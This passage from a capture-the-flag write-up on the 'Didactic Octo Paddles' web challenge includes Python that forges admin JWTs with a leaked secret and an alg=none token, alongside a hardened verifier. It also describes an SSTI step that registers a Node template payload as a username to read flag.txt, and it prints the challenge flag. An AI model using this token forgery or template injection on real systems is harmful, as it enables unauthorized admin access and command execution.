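    header, body = _segment({"alg": "HS256", "typ": "JWT"}), _segment(claims)
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def unsigned_token(claims: dict) -> str:
    """A token with alg=none and an empty signature, as set with the Burp
    JSON Web Tokens extension in the Didactic Octo Paddles write-up."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."


def verify(token: str, secret: str) -> Optional[dict]:
    """Verifier that pins the algorithm: anything but HS256 is rejected before
    the signature is looked at, so 'none' cannot switch verification off.
    Returns the claims on success, None on any failure."""
    try:
        h, b, s = token.split(".")
        header = json.loads(_b64url_decode(h))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None
        expected = hmac.new(secret.encode(), f"{h}.{b}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(s)):
            return None
        claims = json.loads(_b64url_decode(b))
    except ValueError:  # bad segment count, bad base64, bad JSON, bad UTF-8
        return None
    return claims if isinstance(claims, dict) else None


def tickets_allowed(token: str, secret: str) -> bool:
    """The WayWitch route check as the write-up describes it: the session
    token must verify and carry username == 'admin'."""
    claims = verify(token, secret)
    return claims is not None and claims.get("username") == "admin"


if __name__ == "__main__":
    forged = sign_hs256({"username": "admin"}, LEAKED_SECRET)
    print("forged token accepted with leaked secret:", tickets_allowed(forged, LEAKED_SECRET))
    rotated = secrets.token_urlsafe(32)  # a random, unpublished key is what the server needs
    print("forged token accepted after rotation:", tickets_allowed(forged, rotated))
    print("alg=none token accepted:", tickets_allowed(unsigned_token({"username": "admin"}), rotated))
```

Rotating the secret invalidates every token minted with the leaked one, and pinning the algorithm removes the alg=none path regardless of which library is in use.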

Back To Burp

Server Side Template Injection

Hold on, we aren’t finished yet. We have access to the admin portal but no flag. However, the admin portal has a list of active users. I could walk you through the various stages of identifying SSTI such as creating a user with ‘{{ 2 * 404 }}’ in order to get Bob but let’s get on with it. First, I went to HackTricks, searched for SSTI and found the Node JS Render payloads. Next, I modified their payload to cat the flag.txt file.

Didactic Octo Paddles SSTI

Finally, I registered a user with the above payload for their username and a standard string for their password. I then went back to burp and resent the request with the modified JWT token and as you can see below, we got the flag.

Didactic Octo Paddles Flag
HTB{Pr3_C0MP111N6_W17H0U7_P4DD13804rD1N6_5K1115}

Didactic Octo Paddles Review

Looking back, I think this was a fairly simple challenge. However, this challenge absolutely broke me. I was up until the early hours of the morning trying to work this challenge out. This was entirely due to my lack of knowledge of JWT tokens and their quirks. I learnt a lot from it and now I want to master the JWT_Tool and Cookie-Monster tools. I’m starting to like working with parts of the MEAN stack. I’ve mostly only learnt about and tested LAMP-based applications so this is a whole new world for me to explore. Anyway, this is as far as I got with the web challenges. I completed some other challenges but I don’t know if I’m going to write those up.